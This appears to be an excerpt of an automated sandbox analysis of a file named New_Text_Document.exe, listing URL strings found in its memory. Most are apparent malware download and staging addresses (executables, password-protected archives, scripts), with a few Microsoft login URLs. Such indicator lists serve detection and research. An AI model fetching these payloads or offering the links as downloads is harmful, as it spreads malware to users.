                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iso-supporter.com/oe/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://itfolkstechnology.com/01765/download/zip_pass1234.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://izlidemi.github.io/umdk/22.09.2022_siparis_listemiz.xls
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/3u/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/6QV2O2EHWZH1D/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/DOC/kbc9dts71991684654644570io07lx5tws9zd0q/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/Reporting/po3x708837819192166196fun7k976gnpv/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/WwYxH5cctn/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/attachments/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/bg4n3/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/private_module/test_cloud/z3gjv_w4zyu545ts846/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jeffdahlke.com/css/statement/sv8ah2oz31fj/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jhinstitute.com/meia/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://js-hurling.com/pbcontents/kjndgfnjregjwktgtrsgrsregtghthettyyghyt/jfskxgiowyrhn.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jsl.com.ng/aal/aal.js
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://juntadeconfrariesdese.live-website.com/wp-content/jH/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://justplay.asia/google/2LE/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://justplay.asia/google/oCbyPwB8B/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalpavirutchamfoundation.org/un/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karapinarhaber.com.tr/wp-content/download/File_pass1234.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karposshoes.com/pso/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karposshoes.com/pso/?22365141
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://khaithaclothien.edu.vn/tssu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://khaithaclothien.edu.vn/ue/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://khanz.co.nz/ieea/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://khmlanguageinstitute.com/clse/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kipor.ae/dei/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kirpisoft.com.tr/od/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kitabsuperjp.net/ita/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kopihitam.click/nn/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kwelectronics.com.au/mnd/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lasertime.com.mx/xade/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://latierraprometida.co/tm/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lider.fm/tiep/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lineart.in/download/File.7z?pfile=file.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://linkvilleplayers.org/wp-admin/Server.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://loanseed.co/uss/
                    Source: raserver.exe, 00000014.00000002.2477229582.0000000003268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: raserver.exe, 00000014.00000002.2477229582.0000000003268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: raserver.exe, 00000014.00000002.2477229582.0000000003268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: raserver.exe, 00000014.00000002.2477229582.0000000003268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033u
                    Source: raserver.exe, 00000014.00000002.2477229582.0000000003268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: raserver.exe, 00000014.00000002.2477229582.0000000003268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: raserver.exe, 00000014.00000003.1550824407.0000000007BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lookkiero.com/pa/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ltc.typoten.com/e3q352.tar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lycheepanel.info/backer/KiffAppU1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lycheepanel.info/download/?cid=client1
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lycheepanel.info/download/?cid=client2
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lycheepanel.info/download/?cid=client3
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lycheepanel.info/likers/Ifum2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.srg.az/ae/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://makglobal.in/to/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://malaysia-study.com/lao/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mario-sunjic.com/era5ne6.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marrakechfolkloredays.com/clips.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://matsandmore.net/augs/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maviproducciones.com/impresa/documenti.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maviproducciones.com/impresa/impresa.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maxman.shop/vtap/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1032350472058720336/1039600025644306442/t.png?width=810&hei
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://medicalsoft.ec/aauh/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://meonhanong.com/bins/nn1.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://meonhanong.com/bins/rem.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mewham.com/ou/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mhdcr.com/xmi/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://migranoticias.com/ei/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mithransilks.com/download/File.7z?pfile=file.zip
